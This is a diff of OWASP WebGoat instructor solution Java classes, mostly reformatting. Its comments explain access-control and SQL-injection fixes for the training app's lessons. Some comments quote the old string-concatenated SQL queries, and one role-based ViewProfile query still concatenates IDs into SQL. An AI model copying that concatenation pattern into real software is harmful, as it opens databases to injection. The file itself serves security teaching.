answer_results.getString("ssn"),
|
||||
answer_results.getString("title"),
|
||||
answer_results.getString("phone"),
|
||||
answer_results.getString("address1"),
|
||||
answer_results.getString("address2"),
|
||||
answer_results.getInt("manager"),
|
||||
answer_results.getString("start_date"),
|
||||
answer_results.getInt("salary"),
|
||||
answer_results.getString("ccn"),
|
||||
answer_results.getInt("ccn_limit"),
|
||||
answer_results.getString("disciplined_date"),
|
||||
answer_results.getString("disciplined_notes"),
|
||||
answer_results.getString("personal_description"));
|
||||
/* System.out.println("Retrieved employee from db: " +
|
||||
profile.getFirstName() + " " + profile.getLastName() +
|
||||
" (" + profile.getId() + ")");
|
||||
profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
|
||||
answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
|
||||
.getString("title"), answer_results.getString("phone"), answer_results
|
||||
.getString("address1"), answer_results.getString("address2"), answer_results
|
||||
.getInt("manager"), answer_results.getString("start_date"), answer_results
|
||||
.getInt("salary"), answer_results.getString("ccn"), answer_results
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"),
|
||||
answer_results.getString("disciplined_notes"), answer_results
|
||||
.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " +
|
||||
* profile.getFirstName() + " " + profile.getLastName() + " (" +
|
||||
* profile.getId() + ")");
|
||||
*/}
|
||||
}
|
||||
catch ( SQLException sqle )
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
s.setMessage("Error getting employee profile");
|
||||
sqle.printStackTrace();
|
||||
}
|
||||
}
|
||||
catch ( Exception e )
|
||||
} catch (Exception e)
|
||||
{
|
||||
s.setMessage("Error getting employee profile");
|
||||
e.printStackTrace();
|
||||
|
||||
@ -1,3 +1,4 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
|
||||
|
||||
import org.apache.ecs.ElementContainer;
|
||||
@ -11,41 +12,33 @@ import org.owasp.webgoat.session.UnauthorizedException;
|
||||
import org.owasp.webgoat.session.ValidationException;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
|
||||
|
||||
/**
|
||||
* Copyright (c) 2006 Free Software Foundation developed under the custody of the Open Web
|
||||
* Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is published by OWASP
|
||||
* under the GPL. You should read and accept the LICENSE before you use, modify and/or redistribute
|
||||
* this software.
|
||||
* Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is
|
||||
* published by OWASP under the GPL. You should read and accept the LICENSE before you use, modify
|
||||
* and/or redistribute this software.
|
||||
*
|
||||
*/
|
||||
|
||||
/* STAGE 2 FIXES
|
||||
Solution Summary: Edit RoleBasedAccessControl.java and change handleRequest().
|
||||
Modify handleRequest() with lines denoted by // STAGE 2 - FIX.
|
||||
Solution Steps:
|
||||
1. This solution adds an access control check in the controller.
|
||||
Point out that their architecture may require the check to occur in the business function.
|
||||
2. Look at the RoleBasedAccessControl class identify where execution happens of an action.
|
||||
a. action.handleRequest(s); is not protected by an access control check.
|
||||
b. look at handleRequest(s) to determine where access control check should occur.
|
||||
c. add protection by a programmatic authorization check before dispatching to the action:
|
||||
1. Add an isAuthorized() call before dispatching to the action,
|
||||
and throw an unauthorized exception. Tell student this exception exists.
|
||||
Use eclipse command completion to find the isAuthorized() call on the action.
|
||||
From command completion - determine calling arguments of isAuthorized()
|
||||
|
||||
int userId = action.getUserId(s);
|
||||
if (action.isAuthorized(s, userId, action.getActionName()))
|
||||
{
|
||||
action.handleRequest(s);
|
||||
}
|
||||
else
|
||||
throw new UnauthorizedException();
|
||||
|
||||
Repeat stage 1 and note that the function fails with a "Not authorized" message.
|
||||
Tom will be in the list again, because the DB is reset when lesson restarts.
|
||||
Adding the access check in the RoleBasedAccessControl:handleRequest() is putting the check in the “Controller”
|
||||
The access check can also be added to DeleteProfile.deleteEmployeeProfile(), which is putting the check in the “Business Function”
|
||||
/*
|
||||
* STAGE 2 FIXES Solution Summary: Edit RoleBasedAccessControl.java and change handleRequest().
|
||||
* Modify handleRequest() with lines denoted by // STAGE 2 - FIX. Solution Steps: 1. This solution
|
||||
* adds an access control check in the controller. Point out that their architecture may require the
|
||||
* check to occur in the business function. 2. Look at the RoleBasedAccessControl class identify
|
||||
* where execution happens of an action. a. action.handleRequest(s); is not protected by an access
|
||||
* control check. b. look at handleRequest(s) to determine where access control check should occur.
|
||||
* c. add protection by a programmatic authorization check before dispatching to the action: 1. Add
|
||||
* an isAuthorized() call before dispatching to the action, and throw an unauthorized exception.
|
||||
* Tell student this exception exists. Use eclipse command completion to find the isAuthorized()
|
||||
* call on the action. From command completion - determine calling arguments of isAuthorized() int
|
||||
* userId = action.getUserId(s); if (action.isAuthorized(s, userId, action.getActionName())) {
|
||||
* action.handleRequest(s); } else throw new UnauthorizedException(); Repeat stage 1 and note that
|
||||
* the function fails with a "Not authorized" message. Tom will be in the list again, because the DB
|
||||
* is reset when lesson restarts. Adding the access check in the
|
||||
* RoleBasedAccessControl:handleRequest() is putting the check in the “Controller” The access check
|
||||
* can also be added to DeleteProfile.deleteEmployeeProfile(), which is putting the check in the
|
||||
* “Business Function”
|
||||
*/
|
||||
|
||||
public class RoleBasedAccessControl_i extends RoleBasedAccessControl
|
||||
@ -54,15 +47,13 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
|
||||
public void handleRequest(WebSession s)
|
||||
{
|
||||
// System.out.println("RoleBasedAccessControl.handleRequest()");
|
||||
if (s.getLessonSession(this) == null)
|
||||
s.openLessonSession(this);
|
||||
if (s.getLessonSession(this) == null) s.openLessonSession(this);
|
||||
|
||||
String requestedActionName = null;
|
||||
try
|
||||
{
|
||||
requestedActionName = s.getParser().getStringParameter("action");
|
||||
}
|
||||
catch (ParameterNotFoundException pnfe)
|
||||
} catch (ParameterNotFoundException pnfe)
|
||||
{
|
||||
// Missing the action - send them back to login.
|
||||
requestedActionName = LOGIN_ACTION;
|
||||
@ -74,7 +65,8 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
|
||||
if (action != null)
|
||||
{
|
||||
// FIXME: This code has gotten much uglier
|
||||
//System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + action.getActionName());
|
||||
// System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " +
|
||||
// action.getActionName());
|
||||
if (!action.requiresAuthentication())
|
||||
{
|
||||
// Access to Login does not require authentication.
|
||||
@ -106,26 +98,22 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
|
||||
}
|
||||
else
|
||||
setCurrentAction(s, ERROR_ACTION);
|
||||
}
|
||||
catch (ParameterNotFoundException pnfe)
|
||||
} catch (ParameterNotFoundException pnfe)
|
||||
{
|
||||
// System.out.println("Missing parameter");
|
||||
pnfe.printStackTrace();
|
||||
setCurrentAction(s, ERROR_ACTION);
|
||||
}
|
||||
catch (ValidationException ve)
|
||||
} catch (ValidationException ve)
|
||||
{
|
||||
// System.out.println("Validation failed");
|
||||
ve.printStackTrace();
|
||||
setCurrentAction(s, ERROR_ACTION);
|
||||
}
|
||||
catch (UnauthenticatedException ue)
|
||||
} catch (UnauthenticatedException ue)
|
||||
{
|
||||
s.setMessage("Login failed");
|
||||
// System.out.println("Authentication failure");
|
||||
ue.printStackTrace();
|
||||
}
|
||||
catch (UnauthorizedException ue2)
|
||||
} catch (UnauthorizedException ue2)
|
||||
{
|
||||
String stage = getStage(s);
|
||||
// Update lesson status if necessary.
|
||||
@ -133,8 +121,8 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
|
||||
{
|
||||
try
|
||||
{
|
||||
if (GoatHillsFinancial.DELETEPROFILE_ACTION.equals(requestedActionName) &&
|
||||
!isAuthorized(s, getUserId(s), GoatHillsFinancial.DELETEPROFILE_ACTION))
|
||||
if (GoatHillsFinancial.DELETEPROFILE_ACTION.equals(requestedActionName)
|
||||
&& !isAuthorized(s, getUserId(s), GoatHillsFinancial.DELETEPROFILE_ACTION))
|
||||
{
|
||||
setStageComplete(s, STAGE2);
|
||||
}
|
||||
@ -151,10 +139,9 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
|
||||
{
|
||||
// System.out.println("Checking for stage 4 completion");
|
||||
DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
|
||||
int userId = Integer.parseInt((String)s.getRequest().getSession().getAttribute(getLessonName() + "."
|
||||
+ GoatHillsFinancial.USER_ID));
|
||||
int employeeId = s.getParser().getIntParameter(
|
||||
GoatHillsFinancial.EMPLOYEE_ID);
|
||||
int userId = Integer.parseInt((String) s.getRequest().getSession()
|
||||
.getAttribute(getLessonName() + "." + GoatHillsFinancial.USER_ID));
|
||||
int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
|
||||
|
||||
if (!action.isAuthorizedForEmployee(s, userId, employeeId))
|
||||
{
|
||||
@ -178,5 +165,3 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
@ -1,10 +1,10 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
|
||||
|
||||
import java.sql.PreparedStatement;
|
||||
import java.sql.ResultSet;
|
||||
import java.sql.SQLException;
|
||||
import java.sql.Statement;
|
||||
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
|
||||
import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
|
||||
@ -13,11 +13,12 @@ import org.owasp.webgoat.session.Employee;
|
||||
import org.owasp.webgoat.session.UnauthorizedException;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
|
||||
|
||||
/**
|
||||
* Copyright (c) 2006 Free Software Foundation developed under the custody of the Open Web
|
||||
* Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is published by OWASP
|
||||
* under the GPL. You should read and accept the LICENSE before you use, modify and/or redistribute
|
||||
* this software.
|
||||
* Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is
|
||||
* published by OWASP under the GPL. You should read and accept the LICENSE before you use, modify
|
||||
* and/or redistribute this software.
|
||||
*
|
||||
*/
|
||||
|
||||
@ -27,7 +28,6 @@ import org.owasp.webgoat.session.WebSession;
|
||||
/* */
|
||||
/*************************************************/
|
||||
|
||||
|
||||
public class UpdateProfile_i extends UpdateProfile
|
||||
{
|
||||
public UpdateProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
|
||||
@ -48,7 +48,8 @@ public class UpdateProfile_i extends UpdateProfile
|
||||
+ " personal_description = ? WHERE userid = ?;";
|
||||
try
|
||||
{
|
||||
PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
|
||||
PreparedStatement ps = WebSession.getConnection(s)
|
||||
.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
|
||||
|
||||
ps.setString(1, employee.getFirstName());
|
||||
ps.setString(2, employee.getLastName());
|
||||
@ -64,15 +65,13 @@ public class UpdateProfile_i extends UpdateProfile
|
||||
ps.setString(12, employee.getPersonalDescription());
|
||||
ps.setInt(13, subjectId);
|
||||
ps.execute();
|
||||
}
|
||||
catch ( SQLException sqle )
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
s.setMessage("Error updating employee profile");
|
||||
sqle.printStackTrace();
|
||||
}
|
||||
|
||||
}
|
||||
catch ( Exception e )
|
||||
} catch (Exception e)
|
||||
{
|
||||
s.setMessage("Error updating employee profile");
|
||||
e.printStackTrace();
|
||||
@ -84,9 +83,7 @@ public class UpdateProfile_i extends UpdateProfile
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
public void createEmployeeProfile(WebSession s, int userId, Employee employee)
|
||||
throws UnauthorizedException
|
||||
public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException
|
||||
{
|
||||
if (s.isAuthorizedInLesson(userId, RoleBasedAccessControl.UPDATEPROFILE_ACTION)) // FIX
|
||||
{
|
||||
@ -118,14 +115,12 @@ public class UpdateProfile_i extends UpdateProfile
|
||||
ps.setString(14, employee.getPersonalDescription());
|
||||
|
||||
ps.execute();
|
||||
}
|
||||
catch ( SQLException sqle )
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
s.setMessage("Error updating employee profile");
|
||||
sqle.printStackTrace();
|
||||
}
|
||||
}
|
||||
catch ( Exception e )
|
||||
} catch (Exception e)
|
||||
{
|
||||
s.setMessage("Error updating employee profile");
|
||||
e.printStackTrace();
|
||||
|
||||
@ -1,48 +1,40 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
|
||||
|
||||
import java.sql.ResultSet;
|
||||
import java.sql.SQLException;
|
||||
import java.sql.Statement;
|
||||
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
import org.owasp.webgoat.lessons.RoleBasedAccessControl.ViewProfile;
|
||||
import org.owasp.webgoat.session.Employee;
|
||||
import org.owasp.webgoat.session.UnauthorizedException;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
|
||||
/* STAGE 4 FIXES
|
||||
1. Find the code location where this flaw of directly retrieving the profile without data-level access control checking exists:
|
||||
public void handleRequest( WebSession s )
|
||||
{ …
|
||||
Employee employee = getEmployeeProfile(s, userId, employeeId);
|
||||
… }
|
||||
public Employee getEmployeeProfile(WebSession s, int employeeId, int subjectUserId) throws UnauthorizedException { …
|
||||
return getEmployeeProfile(s, employeeId, subjectUserId);
|
||||
… }
|
||||
2. The solution requires a data-level access control check to ensure the user has the rights to access the data they are requesting.
|
||||
a. There is a common method you can take advantage of:
|
||||
isAuthorizedForEmployee(s, userId, subjectUserId)
|
||||
Either tell the student this exists or have them look in DefaultLessonAction.
|
||||
Note that this is not required to implement data access control but is for detection of violations.
|
||||
b. Uncomment the modified query retrieving the user data to have data access control
|
||||
String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
|
||||
"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;
|
||||
3. Bundle the entire logic with this call and throw an unauthorized exception
|
||||
if (isAuthorizedForEmployee(s, userId, subjectUserId))
|
||||
{ ...
|
||||
//String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
|
||||
String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
|
||||
"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; // STAGE 4 - FIX
|
||||
...
|
||||
}
|
||||
else
|
||||
{
|
||||
throw new UnauthorizedException();
|
||||
}
|
||||
4. Repeat stage 3 and note that the function fails with a "Not authorized" message.
|
||||
Adding the access check in the query is providing data-level access control.
|
||||
The access check from isAuthorizedForEmployee is used to detect a violation.
|
||||
The same logic could've been applied after the query but isAuthorizedForEmployee provides a nice centralized abstraction of that logic.
|
||||
|
||||
/*
|
||||
* STAGE 4 FIXES 1. Find the code location where this flaw of directly retrieving the profile
|
||||
* without data-level access control checking exists: public void handleRequest( WebSession s ) { …
|
||||
* Employee employee = getEmployeeProfile(s, userId, employeeId); … } public Employee
|
||||
* getEmployeeProfile(WebSession s, int employeeId, int subjectUserId) throws UnauthorizedException
|
||||
* { … return getEmployeeProfile(s, employeeId, subjectUserId); … } 2. The solution requires a
|
||||
* data-level access control check to ensure the user has the rights to access the data they are
|
||||
* requesting. a. There is a common method you can take advantage of: isAuthorizedForEmployee(s,
|
||||
* userId, subjectUserId) Either tell the student this exists or have them look in
|
||||
* DefaultLessonAction. Note that this is not required to implement data access control but is for
|
||||
* detection of violations. b. Uncomment the modified query retrieving the user data to have data
|
||||
* access control String query =
|
||||
* "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
|
||||
* "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; 3. Bundle
|
||||
* the entire logic with this call and throw an unauthorized exception if
|
||||
* (isAuthorizedForEmployee(s, userId, subjectUserId)) { ... //String query =
|
||||
* "SELECT * FROM employee WHERE userid = " + subjectUserId; String query =
|
||||
* "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
|
||||
* "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; // STAGE 4
|
||||
* - FIX ... } else { throw new UnauthorizedException(); } 4. Repeat stage 3 and note that the
|
||||
* function fails with a "Not authorized" message. Adding the access check in the query is providing
|
||||
* data-level access control. The access check from isAuthorizedForEmployee is used to detect a
|
||||
* violation. The same logic could've been applied after the query but isAuthorizedForEmployee
|
||||
* provides a nice centralized abstraction of that logic.
|
||||
*/
|
||||
|
||||
public class ViewProfile_i extends ViewProfile
|
||||
@ -52,9 +44,7 @@ public class ViewProfile_i extends ViewProfile
|
||||
super(lesson, lessonName, actionName);
|
||||
}
|
||||
|
||||
|
||||
public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId)
|
||||
throws UnauthorizedException
|
||||
public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
|
||||
{
|
||||
// Query the database to determine if the given employee is owned by the given user
|
||||
// Query the database for the profile data of the given employee
|
||||
@ -68,7 +58,8 @@ public class ViewProfile_i extends ViewProfile
|
||||
// Query the database for the profile data of the given employee
|
||||
try
|
||||
{
|
||||
//String query = "SELECT * FROM employee WHERE userid = " + subjectUserId; // STAGE 4 - FIX
|
||||
// String query = "SELECT * FROM employee WHERE userid = " + subjectUserId; // STAGE
|
||||
// 4 - FIX
|
||||
|
||||
// Switch to this query to add Data Access Control
|
||||
//
|
||||
@ -76,45 +67,40 @@ public class ViewProfile_i extends ViewProfile
|
||||
// - qualify on ownership.employer_id to see only the current userId records
|
||||
// - qualify on ownership.employee_id to see the current selected employee profile
|
||||
|
||||
String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
|
||||
"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; // STAGE 4 - FIX
|
||||
String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and "
|
||||
+ "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; // STAGE
|
||||
// 4
|
||||
// -
|
||||
// FIX
|
||||
|
||||
try
|
||||
{
|
||||
Statement answer_statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
|
||||
Statement answer_statement = WebSession.getConnection(s)
|
||||
.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
|
||||
ResultSet answer_results = answer_statement.executeQuery(query);
|
||||
if (answer_results.next())
|
||||
{
|
||||
// Note: Do NOT get the password field.
|
||||
profile = new Employee(
|
||||
answer_results.getInt("userid"),
|
||||
answer_results.getString("first_name"),
|
||||
answer_results.getString("last_name"),
|
||||
answer_results.getString("ssn"),
|
||||
answer_results.getString("title"),
|
||||
answer_results.getString("phone"),
|
||||
answer_results.getString("address1"),
|
||||
answer_results.getString("address2"),
|
||||
answer_results.getInt("manager"),
|
||||
answer_results.getString("start_date"),
|
||||
answer_results.getInt("salary"),
|
||||
answer_results.getString("ccn"),
|
||||
answer_results.getInt("ccn_limit"),
|
||||
answer_results.getString("disciplined_date"),
|
||||
answer_results.getString("disciplined_notes"),
|
||||
answer_results.getString("personal_description"));
|
||||
/* System.out.println("Retrieved employee from db: " +
|
||||
profile.getFirstName() + " " + profile.getLastName() +
|
||||
" (" + profile.getId() + ")");
|
||||
profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
|
||||
answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
|
||||
.getString("title"), answer_results.getString("phone"), answer_results
|
||||
.getString("address1"), answer_results.getString("address2"), answer_results
|
||||
.getInt("manager"), answer_results.getString("start_date"), answer_results
|
||||
.getInt("salary"), answer_results.getString("ccn"), answer_results
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"),
|
||||
answer_results.getString("disciplined_notes"), answer_results
|
||||
.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " +
|
||||
* profile.getFirstName() + " " + profile.getLastName() + " (" +
|
||||
* profile.getId() + ")");
|
||||
*/}
|
||||
}
|
||||
catch ( SQLException sqle )
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
s.setMessage("Error getting employee profile");
|
||||
sqle.printStackTrace();
|
||||
}
|
||||
}
|
||||
catch ( Exception e )
|
||||
} catch (Exception e)
|
||||
{
|
||||
s.setMessage("Error getting employee profile");
|
||||
e.printStackTrace();
|
||||
|
||||
@ -1,33 +1,27 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.SQLInjection;
|
||||
|
||||
import java.sql.PreparedStatement;
|
||||
import java.sql.ResultSet;
|
||||
import java.sql.SQLException;
|
||||
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
|
||||
import org.owasp.webgoat.lessons.SQLInjection.Login;
|
||||
import org.owasp.webgoat.lessons.SQLInjection.SQLInjection;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
|
||||
|
||||
/*
|
||||
Solution Summary: Edit Login.java and change login().
|
||||
Modify login() with lines denoted by // STAGE 2 - FIX.
|
||||
Solution Steps:
|
||||
1. Change dynamic query to parameterized query.
|
||||
a. Replace the dynamic varaibles with the "?"
|
||||
String query = "SELECT * FROM employee WHERE userid = ? and password = ?"
|
||||
|
||||
b. Create a preparedStatement using the new query
|
||||
PreparedStatement answer_statement = SQLInjection.getConnection(s).prepareStatement(
|
||||
query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
|
||||
|
||||
c. Set the values of the parameterized query
|
||||
answer_statement.setString(1, userId); // STAGE 2 - FIX
|
||||
answer_statement.setString(2, password); // STAGE 2 - FIX
|
||||
|
||||
d. Execute the preparedStatement
|
||||
ResultSet answer_results = answer_statement.executeQuery();
|
||||
* Solution Summary: Edit Login.java and change login(). Modify login() with lines denoted by //
|
||||
* STAGE 2 - FIX. Solution Steps: 1. Change dynamic query to parameterized query. a. Replace the
|
||||
* dynamic varaibles with the "?" String query =
|
||||
* "SELECT * FROM employee WHERE userid = ? and password = ?" b. Create a preparedStatement using
|
||||
* the new query PreparedStatement answer_statement =
|
||||
* SQLInjection.getConnection(s).prepareStatement( query, ResultSet.TYPE_SCROLL_INSENSITIVE,
|
||||
* ResultSet.CONCUR_READ_ONLY ); c. Set the values of the parameterized query
|
||||
* answer_statement.setString(1, userId); // STAGE 2 - FIX answer_statement.setString(2, password);
|
||||
* // STAGE 2 - FIX d. Execute the preparedStatement ResultSet answer_results =
|
||||
* answer_statement.executeQuery();
|
||||
*/
|
||||
|
||||
public class Login_i extends Login
|
||||
@ -44,12 +38,16 @@ public class Login_i extends Login
|
||||
|
||||
try
|
||||
{
|
||||
String query = "SELECT * FROM employee WHERE userid = ? and password = ?"; // STAGE 2 - FIX
|
||||
String query = "SELECT * FROM employee WHERE userid = ? and password = ?"; // STAGE 2 -
|
||||
// FIX
|
||||
|
||||
try
|
||||
{
|
||||
PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query,
|
||||
ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); // STAGE 2 - FIX
|
||||
PreparedStatement answer_statement = WebSession.getConnection(s)
|
||||
.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); // STAGE
|
||||
// 2
|
||||
// -
|
||||
// FIX
|
||||
answer_statement.setString(1, userId); // STAGE 2 - FIX
|
||||
answer_statement.setString(2, password); // STAGE 2 - FIX
|
||||
ResultSet answer_results = answer_statement.executeQuery(); // STAGE 2 - FIX
|
||||
@ -60,14 +58,12 @@ public class Login_i extends Login
|
||||
authenticated = true;
|
||||
}
|
||||
|
||||
}
|
||||
catch ( SQLException sqle )
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
s.setMessage("Error logging in");
|
||||
sqle.printStackTrace();
|
||||
}
|
||||
}
|
||||
catch ( Exception e )
|
||||
} catch (Exception e)
|
||||
{
|
||||
s.setMessage("Error logging in");
|
||||
e.printStackTrace();
|
||||
|
||||
@ -1,9 +1,9 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.SQLInjection;
|
||||
|
||||
import java.sql.PreparedStatement;
|
||||
import java.sql.ResultSet;
|
||||
import java.sql.SQLException;
|
||||
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
import org.owasp.webgoat.lessons.SQLInjection.ViewProfile;
|
||||
import org.owasp.webgoat.session.Employee;
|
||||
@ -11,31 +11,23 @@ import org.owasp.webgoat.session.UnauthorizedException;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
import org.owasp.webgoat.util.HtmlEncoder;
|
||||
|
||||
|
||||
/*
|
||||
Solution Summary: Edit ViewProfile.java and change getEmployeeProfile().
|
||||
Modify getEmployeeProfile() with lines denoted by // STAGE 4 - FIX.
|
||||
|
||||
Solution Steps:
|
||||
1. Change dynamic query to parameterized query.
|
||||
a. Replace the dynamic variables with the "?"
|
||||
Old: String query = "SELECT employee.* " +
|
||||
"FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
|
||||
"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;
|
||||
|
||||
New: String query = "SELECT employee.* " +
|
||||
"FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
|
||||
"ownership.employer_id = ? and ownership.employee_id = ?";
|
||||
|
||||
b. Create a preparedStatement using the new query
|
||||
PreparedStatement answer_statement = SQLInjection.getConnection(s).prepareStatement(
|
||||
query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
|
||||
|
||||
c. Set the values of the parameterized query
|
||||
answer_statement.setInt(1, Integer.parseInt(userId)); // STAGE 4 - FIX
|
||||
answer_statement.setInt(2, Integer.parseInt(subjectUserId)); // STAGE 4 - FIX
|
||||
|
||||
d. Execute the preparedStatement
|
||||
ResultSet answer_results = answer_statement.executeQuery();
|
||||
* Solution Summary: Edit ViewProfile.java and change getEmployeeProfile(). Modify
|
||||
* getEmployeeProfile() with lines denoted by // STAGE 4 - FIX. Solution Steps: 1. Change dynamic
|
||||
* query to parameterized query. a. Replace the dynamic variables with the "?" Old: String query =
|
||||
* "SELECT employee.* " +
|
||||
* "FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
|
||||
* "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; New:
|
||||
* String query = "SELECT employee.* " +
|
||||
* "FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
|
||||
* "ownership.employer_id = ? and ownership.employee_id = ?"; b. Create a preparedStatement using
|
||||
* the new query PreparedStatement answer_statement =
|
||||
* SQLInjection.getConnection(s).prepareStatement( query, ResultSet.TYPE_SCROLL_INSENSITIVE,
|
||||
* ResultSet.CONCUR_READ_ONLY ); c. Set the values of the parameterized query
|
||||
* answer_statement.setInt(1, Integer.parseInt(userId)); // STAGE 4 - FIX answer_statement.setInt(2,
|
||||
* Integer.parseInt(subjectUserId)); // STAGE 4 - FIX d. Execute the preparedStatement ResultSet
|
||||
* answer_results = answer_statement.executeQuery();
|
||||
*/
|
||||
|
||||
public class ViewProfile_i extends ViewProfile
|
||||
@ -45,59 +37,51 @@ public class ViewProfile_i extends ViewProfile
|
||||
super(lesson, lessonName, actionName);
|
||||
}
|
||||
|
||||
public Employee getEmployeeProfile(WebSession s, String userId, String subjectUserId)
|
||||
throws UnauthorizedException
|
||||
public Employee getEmployeeProfile(WebSession s, String userId, String subjectUserId) throws UnauthorizedException
|
||||
{
|
||||
// Query the database to determine if this employee has access to this function
|
||||
// Query the database for the profile data of the given employee if "owned" by the given user
|
||||
// Query the database for the profile data of the given employee if "owned" by the given
|
||||
// user
|
||||
|
||||
Employee profile = null;
|
||||
|
||||
try
|
||||
{
|
||||
String query = "SELECT employee.* " +
|
||||
"FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
|
||||
"ownership.employer_id = ? and ownership.employee_id = ?";
|
||||
String query = "SELECT employee.* "
|
||||
+ "FROM employee,ownership WHERE employee.userid = ownership.employee_id and "
|
||||
+ "ownership.employer_id = ? and ownership.employee_id = ?";
|
||||
|
||||
try
|
||||
{
|
||||
PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query,
|
||||
ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); // STAGE 4 - FIX
|
||||
PreparedStatement answer_statement = WebSession.getConnection(s)
|
||||
.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); // STAGE
|
||||
// 4
|
||||
// -
|
||||
// FIX
|
||||
answer_statement.setInt(1, Integer.parseInt(userId)); // STAGE 4 - FIX
|
||||
answer_statement.setInt(2, Integer.parseInt(subjectUserId)); // STAGE 4 - FIX
|
||||
ResultSet answer_results = answer_statement.executeQuery(); // STAGE 4 - FIX
|
||||
if (answer_results.next())
|
||||
{
|
||||
// Note: Do NOT get the password field.
|
||||
profile = new Employee(
|
||||
answer_results.getInt("userid"),
|
||||
answer_results.getString("first_name"),
|
||||
answer_results.getString("last_name"),
|
||||
answer_results.getString("ssn"),
|
||||
answer_results.getString("title"),
|
||||
answer_results.getString("phone"),
|
||||
answer_results.getString("address1"),
|
||||
answer_results.getString("address2"),
